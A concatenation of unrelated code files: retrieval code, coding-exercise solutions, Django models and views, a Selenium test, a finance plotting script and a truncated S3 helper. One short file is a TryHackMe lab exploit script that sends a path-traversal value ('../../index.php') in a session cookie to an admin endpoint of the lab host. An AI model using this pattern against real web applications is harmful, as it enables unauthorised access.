input_file_pattern):\n \"\"\"\n A full stop plus newline marks a paragraph break; consecutive paragraphs are merged while the result stays under the maximum length, and over-long paragraphs are split on full stops.\n :param input_file_pattern:\n :return:\n \"\"\"\n sentences = []\n corpus = []\n sen_tmp = \"\"\n for f in glob.iglob(str(input_file_pattern)):\n print(f)\n with open(f, \"r\", encoding=\"utf-8\") as fp:\n lines = []\n for line in fp:\n line = self.strQ2B(re.sub(r\"\\s+\", \"\", line)) # convert full-width to half-width\n if len(line) < 2: continue\n lines.append(line)\n lines_str = \"\\n\".join(lines)\n paragraphs = lines_str.split(\"。\\n\")\n for para in paragraphs:\n if len(sen_tmp) + len(para) <= self.MAX_LEN:\n sen_tmp += para + \"。\\n\"\n else:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n if len(para) <= self.MAX_LEN:\n sen_tmp = para + \"。\\n\"\n else:\n sen_tmp = \"\"\n para_sep = para.split(\"。\")\n for p in para_sep:\n if len(sen_tmp) + len(p) <= self.MAX_LEN:\n sen_tmp += p + \"。\"\n else:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n sen_tmp = p + \"。\"\n sen_tmp += \"\\n\"\n if sen_tmp:\n words = self.cut_and_stop(sen_tmp)\n corpus.append(words)\n sentences.append(sen_tmp)\n sen_tmp = \"\"\n assert len(sentences) == len(corpus)\n print(\"Total paragraphs: \", len(sentences))\n return sentences, corpus\n\n def get_scores(self, document):\n \"\"\"\n Given a sentence, return similarity scores against every candidate in the corpus.\n :param document: str\n :return: List[float]\n \"\"\"\n line = self.strQ2B(re.sub(r\"\\s+\", \"\", document)) # convert full-width to half-width\n tokens = self.cut_and_stop(line)\n return self.bm25.get_scores(tokens)\n\n def top_k(self, document, k=1):\n \"\"\"\n Given a document, return the k most similar sentences.\n :param document: str\n :param k:\n :return: List[str]\n \"\"\"\n scores = self.get_scores(document)\n indexes = heapq.nlargest(k, range(len(scores)), scores.__getitem__)\n return [self.sentences[i] for i in indexes]\n\n def dump(self):\n with open(self.model, 'wb') as fpm, open(self.sen, 'wb') as fpse, open(self.stop, 'wb') as fpst:\n dill.dump(self.bm25, fpm)\n dill.dump(self.sentences, fpse)\n dill.dump(self.stop_words, fpst)\n\n def load(self):\n with open(self.model, 'rb') as fpm, open(self.sen, 'rb') as fpse, open(self.stop, 'rb') as fpst:\n self.bm25 = dill.load(fpm)\n self.sentences = dill.load(fpse)\n self.stop_words = dill.load(fpst)\n\n\nTAGS = \"ABCDⅠⅡⅢⅣⅤⅥⅦⅧⅨ①②③④⑤⑥⑦⑧.、0123456789 \"\n\n\ndef test(mode=\"1\", top_k=3): # mode=0: query only; mode=1: query+option\n datasets = \"../data/train.json\"\n corpus_files = \"../data/books/*.txt\"\n bm25_retrieval = BM25Retrieval(corpus_files, path=\"./models/\")\n time_start = time.time()\n num = 0\n for f in glob.glob(str(datasets)):\n dataset_new = []\n with open(f, \"r\", encoding=\"utf-8\") as fp, \\\n open(f + \".mode\" + mode + \".top\" + str(top_k) + \".out\", \"w\", encoding=\"utf-8\") as fp1:\n for line in fp:\n data = json.loads(line)\n query = data[\"question\"]\n options = data[\"options\"]\n evidences = {}\n if mode == \"0\":\n evidence = bm25_retrieval.top_k(query.strip(TAGS), top_k)\n for k in options.keys():\n evidences[k] = evidence\n elif mode == \"1\":\n for k, v in options.items():\n evidence = bm25_retrieval.top_k(query.strip(TAGS) + \"\\n\" + v.strip(TAGS), top_k)\n evidences[k] = evidence\n data[\"evidences\"] = evidences\n dataset_new.append(data)\n for d in dataset_new:\n fp1.write(json.dumps(d, ensure_ascii=False) + \"\\n\")\n num += 1\n time_end = time.time()\n print(\"Total examples: \", num)\n print(\"Sec/example: \", (time_end - time_start) 
/ num)\n\n\nif __name__ == \"__main__\":\n test(mode=\"1\", top_k=3)\n","sub_path":"retrieval/bm25.py","file_name":"bm25.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"194788105","text":"import sys\nsys.stdin = open(\"input_4837.txt\", \"r\")\nsys.stdout = open(\"output_4837.txt\", \"w\")\n\nT = int(input())\nfor t in range(1, T+1):\n arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n lst = list(map(int, input().split()))\n N = lst[0]\n K = lst[1]\n result = 0 \n for i in range(1 << len(arr)) :\n part_set=[]\n \n for j in range(len(arr)): \n if i & (1 << j) !=0:\n part_set += [arr[j]]\n\n \n if len(part_set) == N:\n sum_set = 0 \n for x in part_set:\n sum_set += x\n if sum_set == K:\n result +=1\n else:\n result == 0\n\n print('#'+str(t)+' '+ str(result))\n","sub_path":"SWEA/4837_부분집합의합.py","file_name":"4837_부분집합의합.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"107689273","text":"import requests\nimport time\n\ntarget_url = \"http://cmess.thm\"\ncmd = \"ping 10.6.32.20\"\n\nurl = target_url+\"?c=admin\"\ncookies = {\"GSESSIONID\": \"../../index.php\"}\nheaders = {\"User-Agent\": \"\"}\nrequests.get(url, headers=headers, cookies=cookies)\ntime.sleep(5)\nrequests.get(target_url+\"/index.php\")","sub_path":"tryhackme/cmess/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"277670078","text":"#!/bin/python3\n\nimport sys\n\nfrom datetime import timedelta\nfrom datetime import date\n\ndef solve(year):\n if year >= 1919:\n d1 = date(day=1,month=1,year=year)\n d2 = timedelta(days=255)\n resp = d1 + d2\n return str(resp.day).zfill(2) + \".\" + str(resp.month).zfill(2) + \".\" + str(resp.year)\n elif year < 1918:\n if year%4!=0:\n #not leap year\n return \"13.09.\" + str(year)\n else:\n return \"12.09.\" + str(year)\n else:\n d1 = date(day=1,month=1,year=year)\n d2 = timedelta(days = 268)\n resp = d1+d2\n return str(resp.day).zfill(2) + \".\" + str(resp.month).zfill(2) + \".\" + str(resp.year)\n\n\n\n\n\n\n\nyear = int(input().strip())\nresult = solve(year)\nprint(result)\n","sub_path":"dayProgrammer.py","file_name":"dayProgrammer.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"98389946","text":"from django.db import models\nfrom django.conf import settings\n\nfrom model_utils import Choices\nfrom model_utils.fields import AutoCreatedField\nfrom model_utils.models import TimeStampedModel, StatusModel\n\nfrom .signals import user_linked_to_response\nfrom .utils import generate_code, filter_responses\n\n\nclass Referral(models.Model):\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, related_name=\"referral_codes\", null=True\n )\n label = models.CharField(max_length=100, blank=True)\n code = models.CharField(max_length=40, unique=True)\n expired_at = models.DateTimeField(null=True)\n created_at = AutoCreatedField()\n\n def __unicode__(self):\n if self.user:\n return \"%s (%s)\" % (self.user, self.code)\n else:\n return self.code\n\n @classmethod\n def for_request(cls, request):\n cookie = request.COOKIES.get(\"referral\")\n if cookie:\n code, session_key = cookie.split(\":\")\n\n try:\n return Referral.objects.get(code=code)\n except Referral.DoesNotExist:\n pass\n\n 
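# NOTE: for_request() above reads the "referral" cookie as a
# "<code>:<session_key>" pair and looks up only the code half, so a stale
# session_key in the cookie still resolves to the right Referral.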
@property\n def response_count(self):\n return self.responses.filter(action=\"RESPONDED\").count()\n\n @classmethod\n def create(cls, user=None, label=\"\"):\n code = generate_code(cls)\n\n obj, _ = cls.objects.get_or_create(user=user, code=code, label=label)\n\n return obj\n\n @classmethod\n def record_response(cls, request, action_string):\n referral = cls.referral_for_request(request)\n\n if referral:\n return referral.respond(request, action_string)\n\n @classmethod\n def referral_for_request(cls, request):\n if request.user.is_authenticated():\n qs = ReferralResponse.objects.filter(user=request.user)\n else:\n qs = ReferralResponse.objects.filter(session_key=request.session.session_key)\n\n try:\n return qs.order_by(\"-created_at\")[0].referral\n except IndexError:\n pass\n\n def link_responses_to_user(self, user, session_key):\n responses = self.responses.filter(session_key=session_key, user__isnull=True)\n\n for response in responses:\n response.user = user\n response.save(update_fields=['user'])\n\n user_linked_to_response.send(sender=self, response=response)\n\n def respond(self, request, action_string, user=None):\n if user is None:\n if request.user.is_authenticated():\n user = request.user\n else:\n user = None\n\n ip_address = request.META.get(settings.IP_ADDRESS_META_FIELD, \"\")\n\n kwargs = dict(\n referral=self,\n session_key=request.session.session_key,\n ip_address=ip_address,\n action=action_string,\n user=user\n )\n\n return ReferralResponse.objects.create(**kwargs)\n\n def filtered_responses(self):\n return filter_responses(referral=self)\n\n\nclass ReferralResponse(models.Model):\n referral = models.ForeignKey(Referral, related_name=\"responses\")\n session_key = models.CharField(max_length=40)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True)\n ip_address = models.CharField(max_length=45)\n action = models.CharField(max_length=128)\n created_at = AutoCreatedField()\n\n\nclass ReferralsReward(TimeStampedModel, StatusModel):\n STATUS = Choices('pending', 'redeemed')\n\n user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='rewards')\n response = models.ForeignKey(ReferralResponse, blank=True, null=True)\n\n class Meta:\n verbose_name = \"Referrals Reward\"\n verbose_name_plural = \"Referrals Rewards\"\n\n def __unicode__(self):\n return self.user\n\n def get_redeem(self):\n self.status = self.STATUS.redeemed\n self.save()\n","sub_path":"bidi/referrals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"38402956","text":"#回溯法\nfrom typing import List\nclass Solution:\n def makesquare(self, matchsticks: List[int]) -> bool:\n ssum = sum(matchsticks)\n if ssum%4 !=0:\n return False\n matchsticks.sort(reverse=True)\n num = ssum//4\n\n edges = [0]*4\n def dfs(idx:int)->bool:\n if idx == len(matchsticks):\n return True\n for i in range(4):\n edges[i] +=matchsticks[idx]\n if edges[i] <= num and dfs(idx+1):\n return True\n edges[i] -= matchsticks[idx]\n return False\n return dfs(0)\n\n\nx = Solution()\nx.makesquare([5,5,5,5,4,4,4,4,3,3,3,3])\n\n \n","sub_path":"473. 火柴拼正方形/473. 火柴拼正方形.py","file_name":"473. 
火柴拼正方形.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"267096053","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\n\nclass SearchTests(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n self.driver.get('http://demo-store.seleniumacademy.com')\n \n def test_count_of_promo_banners_images(self):\n #banner_list = self.driver.find_element_by_class_name(\"promos\")\n #banners = banner_list.find_elements_by_tag_name(\"img\")\n banners = self.driver.find_elements_by_tag_name(\"img\")\n self.assertEqual(3, len(banners))\n\n def tearDown(self):\n self.driver.quit()\n \nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"selenium1/findelement_tag.py","file_name":"findelement_tag.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651230834","text":"from django.shortcuts import render\nfrom django.views import View\nfrom PyDictionary import PyDictionary\n\n# Create your views here.\n\nclass SearchView(View):\n def get(self, request):\n return render(request, \"dict/search.html\")\n\nclass ResultView(View):\n def post(self, request):\n word = request.POST[\"value\"]\n object = PyDictionary()\n meaning = object.meaning(word)\n syn = object.synonym(word)\n ant = object.antonym(word)\n\n # var = Dict(word=word, time=datetime.now())\n # var.save()\n\n return render(request, \"dict/result.html\", {'Word':word, 'Meaning':meaning, 'Synonym':syn, 'Antonym': ant})","sub_path":"enprac/dictionary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233358612","text":"class Solution(object):\n\n def findPeak(self, nums, l, r):\n if r - l <= 2:\n return None\n\n mid = (r + l) // 2\n ll = nums[mid - 1]\n rr = nums[mid + 1]\n m = nums[mid]\n\n if ll < m and m > rr:\n return mid\n\n res = None\n if ll > m:\n res = self.findPeak(nums, l, mid + 1)\n\n if res:\n return res\n\n if rr > m:\n res = self.findPeak(nums, mid, r)\n\n if res:\n return res\n\n return None\n\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return 0\n\n if nums[0] > nums[1]:\n return 0\n if nums[-1] > nums[-2]:\n return len(nums) - 1\n\n ret = self.findPeak(nums, 0, len(nums))\n\n return ret\n\n\nif __name__ == \"__main__\":\n s = Solution()\n\n nums = [1, 2, 3, 1]\n\n # nums = [-26, 2, 9, 30, 25, 10, -60, 95, -91, 91, -43, 46, -17, 27, 21, -39, 66, 74, -21, -86, 39, -66, -64, -49, 40,\n # 34, 69, -97, -24, 42, 18, -15, 80, 76, -78, 92, -44, 83, 88, 67, -70, 73, -79, 90, 41, -77, -61, 28, 19, 45]\n\n # nums = [1, 2, 1, 3, 5, 6, 4]\n nums = [3, 2, 1]\n print(s.findPeakElement(nums))\n","sub_path":"p162.py","file_name":"p162.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"327447128","text":"class Solution:\n def findOcurrences(self, text: str, first: str, second: str) -> List[str]:\n # Time: O(n); n being the length of text\n # Space: O(1)\n \n # Split text into words\n words = text.split()\n print(words)\n \n # Use two pointers and keep track of 
the range first-second-third\n res = []\n for i in range(2, len(words)):\n if words[i-2] == first and words[i-1] == second:\n res.append(words[i])\n \n return res","sub_path":"leetcode/lc1078_Occurrences_After_Bigram.py","file_name":"lc1078_Occurrences_After_Bigram.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"526709533","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nfrom apps.bcpp.choices import (YES_NO_DWTA, YES_NO_UNSURE, YES_NO_UNSURE_DWTA, SEXDAYS_CHOICE, LASTSEX_CHOICE, FIRSTRELATIONSHIP_CHOICE,\n FIRSTPARTNERHIV_CHOICE, FIRSTDISCLOSE_CHOICE, FIRSTCONDOMFREQ_CHOICE, AGE_RANGES)\nfrom apps.bcpp_list.models import PartnerResidency\n\nfrom .base_scheduled_visit_model import BaseScheduledVisitModel\n\n\nclass BaseSexualPartner (BaseScheduledVisitModel):\n\n first_partner_live = models.ManyToManyField(\n PartnerResidency,\n verbose_name=_(\"Over the past 12 months, where has this sexual partner\"\n \" lived to the best of your knowledge?\"),\n help_text=\"\")\n\n third_last_sex = models.CharField(\n verbose_name=_(\"When was the last [most recent] time you had sex with\"\n \" this person (how long ago)?\"),\n max_length=25,\n choices=SEXDAYS_CHOICE,\n help_text=\"\")\n\n third_last_sex_calc = models.IntegerField(\n verbose_name=_(\"Give the number of days/months since last had sex with this person.\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"e.g. if last sex was last night, then it should be recorded as 1 day\")\n\n first_first_sex = models.CharField(\n verbose_name=_(\"When was the first time you had sex with this person [how long ago]?\"),\n max_length=25,\n choices=LASTSEX_CHOICE,\n help_text=\"\")\n\n first_first_sex_calc = models.IntegerField(\n verbose_name=_(\"Give the number of days/months/years since first had sex with this person.\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"e.g. 
if first sex was last night, then it should be recorded as 1 day\")\n\n first_sex_current = models.CharField(\n verbose_name=_(\"Do you expect to have sex with this person again?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n first_relationship = models.CharField(\n verbose_name=_(\"What type of relationship do you have with this person?\"),\n max_length=40,\n choices=FIRSTRELATIONSHIP_CHOICE,\n help_text=\"\")\n\n first_exchange = models.CharField(\n verbose_name=_(\"To the best of your knowledge, how old is this person?\"),\n max_length=40,\n choices=AGE_RANGES,\n help_text=(\"Note: If participant does not want to answer, leave blank.\"))\n\n concurrent = models.CharField(\n verbose_name=_(\"Over the past 12 months, during the time you were having a sexual relationship\"\n \" with this person, did YOU have sex with other people (including husband/wife)?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n goods_exchange = models.CharField(\n verbose_name=_(\"Have you received money, transport, food/drink, or other goods in exchange for\"\n \" sex from this partner?\"),\n max_length=25,\n choices=YES_NO_DWTA,\n help_text=\"\")\n\n first_sex_freq = models.IntegerField(\n verbose_name=_(\"During the last 3 months [of your relationship, if it has ended] how many \"\n \"times did you have sex with this partner?\"),\n max_length=2,\n null=True,\n blank=True,\n help_text=\"\")\n\n first_partner_hiv = models.CharField(\n verbose_name=_(\"What is this partner's HIV status?\"),\n max_length=25,\n choices=FIRSTPARTNERHIV_CHOICE,\n null=True,\n help_text=\"\")\n\n partner_hiv_test = models.CharField(\n verbose_name=_(\"Has your partner been tested for HIV in last 12 months\"),\n choices=YES_NO_UNSURE_DWTA,\n max_length=25,\n help_text=\"\")\n\n first_haart = models.CharField(\n verbose_name=_(\"Is this partner taking antiretroviral treatment?\"),\n max_length=25,\n choices=YES_NO_UNSURE,\n null=True,\n blank=True,\n help_text=\"supplemental\")\n\n first_disclose = models.CharField(\n verbose_name=_(\"Have you told this partner your HIV status?\"),\n max_length=30,\n choices=FIRSTDISCLOSE_CHOICE,\n null=True,\n help_text=\"supplemental\")\n\n first_condom_freq = models.CharField(\n verbose_name=_(\"When you have [had] sex with this partner, how often \"\n \"do you or your partner use a condom?\"),\n max_length=25,\n choices=FIRSTCONDOMFREQ_CHOICE,\n null=True,\n help_text=\"supplemental\")\n\n first_partner_cp = models.CharField(\n verbose_name=_(\"To the best of your knowledge, did he/she ever have \"\n \"other sex partners while you two were having a sexual relationship?\"),\n max_length=25,\n choices=YES_NO_UNSURE,\n null=True,\n help_text=\"supplemental\")\n\n class Meta:\n abstract = True\n","sub_path":"apps/bcpp_subject/models/base_sexual_partner.py","file_name":"base_sexual_partner.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"14952338","text":"'''\nThe purpose of this script is to plot time series data for comparison to trading results\n\n\nInput: daily equity value and volatility\n\nOutput: plots over different time frames\n\n\nNotes:\n\n\npandas version: 0.23.4\nmatplotlib version: 2.2.2\nnumpy version: 1.11.3\nscipy version: 1.1.0\n\npython version: 3.5.5\n\n'''\n\nimport csv\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport 
math\n\n\nsp_input_file='data/^GSPC.csv'\nvol_input_file='data/volatility40.csv'\nequity_input_file='_equity_curve_02_05_20_3.csv'\n# ~ vol2_input_file='data/volatility40_2.csv'\n# ~ volmq_input_file='data/vixmq_dec08_to_nov18.csv'\n\n\nsp_data_df = pd.read_csv(sp_input_file,header=0)\nvol_data_df = pd.read_csv(vol_input_file,header=0)\nequity_data_df = pd.read_csv(equity_input_file,header=0)\n# ~ volmq_data_df = pd.read_csv(volmq_input_file,header=0)\n# ~ vol2_data_df = pd.read_csv(vol2_input_file,header=0)\n\n\nsp_date=sp_data_df['Date'].tolist()\nsp_price=sp_data_df['Close'].tolist()\n\nvol_date=vol_data_df['Date'].tolist()\nvol_price=vol_data_df['Volatility'].tolist()\n\nequity_date=equity_data_df['Date'].tolist()\nequity_price=equity_data_df['Equity1'].tolist()\n\n# ~ vol2_date=vol2_data_df['Date'].tolist()\n# ~ vol2_price=vol2_data_df['Volatility'].tolist()\n\n# ~ volmq_date=volmq_data_df['Date'].tolist()\n# ~ volmq_price=volmq_data_df['Close'].tolist()\n\n\n#plot entire series\n'''\nsp_start_idx=2\nsp_end_idx=17420\nvol_start_idx=2\nvol_end_idx=17420\n'''\n\n#plot 20 days around given date\n'''\ndate='2015-08-21'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\nvolmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-10\nsp_end_idx=sp_date_idx+10\nvol_start_idx=vol_date_idx-10\nvol_end_idx=vol_date_idx+10\nvolmq_start_idx=volmq_date_idx-10\nvolmq_end_idx=volmq_date_idx+10\n\n'''\n#plot 100 days around given date\n'''\ndate='1998-08-21'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\n# ~ vol2_date_idx=vol2_date.index(date)\n# ~ volmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-50\nsp_end_idx=sp_date_idx+50\nvol_start_idx=vol_date_idx-50\nvol_end_idx=vol_date_idx+50\n# ~ vol2_start_idx=vol2_date_idx-50\n# ~ vol2_end_idx=vol2_date_idx+50\n# ~ volmq_start_idx=volmq_date_idx-50\n# ~ volmq_end_idx=volmq_date_idx+50\n'''\n\n#plot 200 days around given date\n'''\ndate='2018-02-01'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\nvol2_date_idx=vol2_date.index(date)\nvolmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-100\nsp_end_idx=sp_date_idx+100\nvol_start_idx=vol_date_idx-100\nvol_end_idx=vol_date_idx+100\nvol2_start_idx=vol2_date_idx-100\nvol2_end_idx=vol2_date_idx+100\nvolmq_start_idx=volmq_date_idx-100\nvolmq_end_idx=volmq_date_idx+100\n'''\n\n#plot date range\n\nstart_date='1990-07-13'\n# start_date='1965-08-11'\n# start_date='1972-08-11'\n# start_date='1982-08-11'\n\nend_date='1995-02-10'\n# end_date='1998-10-05'\n# end_date='1982-08-11'\n# end_date='1980-04-30'\n# end_date='1982-08-18'\n# end_date='1987-08-26' # before 1987\n# end_date='1990-03-14'\n# end_date='2019-03-11'\n\nsp_start_idx=sp_date.index(start_date)\nsp_end_idx=sp_date.index(end_date)\nvol_start_idx=vol_date.index(start_date)\nvol_end_idx=vol_date.index(end_date)\nequity_start_idx=equity_date.index(start_date)\nequity_end_idx=equity_date.index(end_date)\n# vol2_start_idx=vol2_date.index(start_date)\n# vol2_end_idx=vol2_date.index(end_date)\n# volmq_start_idx=volmq_date.index(start_date)\n# volmq_end_idx=volmq_date.index(end_date)\n\n\n# remove extras\n\n# ~ volmq_date_plot=volmq_date[volmq_start_idx:volmq_end_idx]\n# ~ volmq_price_plot=volmq_price[volmq_start_idx:volmq_end_idx]\n'''\nvolmq_range=np.arange(volmq_start_idx,volmq_end_idx)\nvol_range=np.arange(vol_start_idx,vol_end_idx)\ni=0\nfor y in range(len(vol_range)):\n\tvol_date_i=vol_date[vol_range[y]]\n\tvolmq_date_i=volmq_date[volmq_range[y+i]]\n\t# print('y: ',y,'i: 
',i,' ',vol_date_i,volmq_date_i)\n\tif vol_date_i != volmq_date_i:\n\t\t# print('delete volmq data')\n\t\tdel volmq_date_plot[volmq_range[i]]\n\t\tdel volmq_price_plot[volmq_range[i]]\n\t\ti += 1\n\t\n'''\n# print(len(volmq_date_plot))\n# print(len(vol_date[vol_start_idx:vol_end_idx]))\n\n####\n# plot 2 plots\n####\n'''\nfig = plt.figure()\n# plot s&p\nax = fig.add_subplot(211)\nplt.plot(sp_date[sp_start_idx:sp_end_idx], sp_price[sp_start_idx:sp_end_idx],color='b')\nplt.ylabel('Price')\n# plt.xlabel(r'Date')\nplt.title(r'S&P Price')\n\ngrid_num=15\ntime_step=int((sp_end_idx-sp_start_idx)/grid_num)\nsteps=np.arange(sp_start_idx,sp_end_idx,time_step)\ndates=[sp_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n#plot vol\nax = fig.add_subplot(212)\nplt.plot(vol_date[vol_start_idx:vol_end_idx], vol_price[vol_start_idx:vol_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Vol')\nplt.xlabel(r'Date')\nplt.title(r'Volatility')\n\ngrid_num=15\ntime_step=int((vol_end_idx-vol_start_idx)/grid_num)\nsteps=np.arange(vol_start_idx,vol_end_idx,time_step)\ndates=[vol_date[step] for step in steps]\nax.set_xticks(dates)\nplt.xticks(rotation=90)\nplt.grid()\n'''\n\n####\n# plot 3 plots\n####\n\nfig = plt.figure()\n# plot s&p\nax = fig.add_subplot(311)\nplt.plot(sp_date[sp_start_idx:sp_end_idx], sp_price[sp_start_idx:sp_end_idx],color='b')\nplt.ylabel('Price')\n# plt.xlabel(r'Date')\nplt.title(r'S&P Price')\n\ngrid_num=15\ntime_step=int((sp_end_idx-sp_start_idx)/grid_num)\nsteps=np.arange(sp_start_idx,sp_end_idx,time_step)\ndates=[sp_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n#plot vol\nax = fig.add_subplot(312)\nplt.plot(vol_date[vol_start_idx:vol_end_idx], vol_price[vol_start_idx:vol_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Vol')\n# plt.xlabel(r'Date')\nplt.title(r'Volatility')\n\ngrid_num=15\ntime_step=int((vol_end_idx-vol_start_idx)/grid_num)\nsteps=np.arange(vol_start_idx,vol_end_idx,time_step)\ndates=[vol_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n\n#plot equity\nax = fig.add_subplot(313)\nplt.plot(equity_date[equity_start_idx:equity_end_idx], equity_price[equity_start_idx:equity_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Equity')\nplt.xlabel(r'Date')\nplt.title(r'Equity')\n\ngrid_num=15\ntime_step=int((equity_end_idx-equity_start_idx)/grid_num)\nsteps=np.arange(equity_start_idx,equity_end_idx,time_step)\ndates=[equity_date[step] for step in steps]\nax.set_xticks(dates)\nplt.xticks(rotation=90)\nplt.grid()\n\n\n\nplt.show()\n","sub_path":"scripts/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} 
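plot_data.py above repeats the same grid_num/time_step/set_xticks block once per subplot to thin out the date ticks. A small helper, shown here only as a sketch of how that repetition could be factored out (it is not part of the original script), with grid_num defaulting to the script's hard-coded 15:

```python
# Sketch of the x-tick thinning pattern repeated in plot_data.py above.
# `dates` is the full list of date strings; [start_idx, end_idx) is the slice
# being plotted; label=False blanks the labels on the upper subplots.
import numpy as np
import matplotlib.pyplot as plt

def thin_date_ticks(ax, dates, start_idx, end_idx, grid_num=15, label=True):
    time_step = max(1, int((end_idx - start_idx) / grid_num))
    steps = np.arange(start_idx, end_idx, time_step)
    ticks = [dates[step] for step in steps]
    ax.set_xticks(ticks)
    if label:
        plt.setp(ax.get_xticklabels(), rotation=90)
    else:
        ax.set_xticklabels([''] * len(ticks))
```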
+{"seq_id":"589813163","text":"listA = []\nlistB = []\nnum = int(input(\"gimme numbers to put in list: \"))\nwhile (num != 0):\n listA.append(num)\n num = int(input(\"gimme another number: \"))\nprint (listA)\n\nlowestNum=listA[0]\nwhile len(listB) < 2:\n for i in range(1, len(listA)):\n if listA[i] < lowestNum:\n lowestNum = listA[i]\n listB.append(lowestNum)\n listA.remove(lowestNum)\nprint (listB[1])\n \n\n\n\n'''\nprint(\"The lowest number in the list is:\", lowestNum)\nprint(\"The position of the lowest number is:\" ,listA.index(lowestNum))\nprint(\"I'm deleting it. BYE!\")\nlistA.remove(lowestNum)\nprint(listA)\n\nlowestNum=listA[0]\nprint(\"So, now - the lowest number in the list is....(AKA the second lowest)\")\n\n for i in range(0, len(listA)):\n if listA[i] < lowestNum:\n lowestNum = listA[i]\n\nprint(\"The lowest number in the list is:\", lowestNum)\n'''\n","sub_path":"Labs/Week4/Lab4_1.2_v2_DoesntWork.py","file_name":"Lab4_1.2_v2_DoesntWork.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"42877644","text":"'''\nAWS S3 communication\n'''\nfrom app.errors import AppBaseError\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom botocore.vendored.requests.exceptions import RequestException\nimport config\nimport datetime\nfrom iso8601 import UTC\nimport json\nimport logging\nimport six\nimport sys\nimport time\n\n_logger = logging.getLogger(__name__)\n\nTS_AWS_S3_BUCKET = config.TS_AWS_S3_BUCKET\nTS_AWS_S3_PREFIX = config.TS_AWS_S3_PREFIX\n\nclass S3ClientError(AppBaseError):\n '''\n S3 client communication errors.\n '''\n\ndef _get_alert_data_key(alert_id):\n '''\n Takes an alert ID and returns an S3 key path.\n '''\n alert_key = '/'.join(['alerts',\n alert_id[0:2],\n alert_id[2:4],\n alert_id\n ])\n\n if TS_AWS_S3_PREFIX:\n alert_key = 